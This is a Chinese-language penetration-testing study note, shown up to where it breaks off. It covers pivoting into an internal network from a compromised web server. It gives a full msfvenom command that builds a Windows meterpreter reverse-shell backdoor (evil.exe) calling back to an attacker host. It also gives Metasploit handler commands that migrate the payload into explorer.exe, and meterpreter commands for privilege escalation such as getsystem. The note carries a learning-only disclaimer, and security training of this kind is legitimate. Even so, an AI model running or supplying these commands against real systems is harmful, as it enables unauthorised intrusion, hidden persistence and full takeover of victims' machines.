郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。
内网渗透流程
1 前提
利用已经控制的一台计算机作为入侵内网的跳板,在其他内网计算机看来访问全部来自于跳板机(WEB Server)
2 实验环境
2.1 建立 meterpreter 反向连接
-
生成 Metaspolit 后门程序
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe
-
kali 配置监听 meterpreter 反向连接,并自动将恶意软件的进程迁移至 explorer.exe
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.2 set autorunscript migrate -n explorer.exe run
-
WEB Server 下载 Metaspolit 后门程序,并打开程序
-
meterpreter 反向连接建立成功
2.2 收集信息提升权限
ipconfig Display interfaces
route View and modify the routing table
getuid Get the user that the server is running as 查看当前用户
getprivs Attempt to enable all privileges available to the current process 尽可能提升权限
getsystem Attempt to elevate your privilege to that of local system. 通过各种攻击向量来提升本地系统权限
ps List running processes 列出进程
</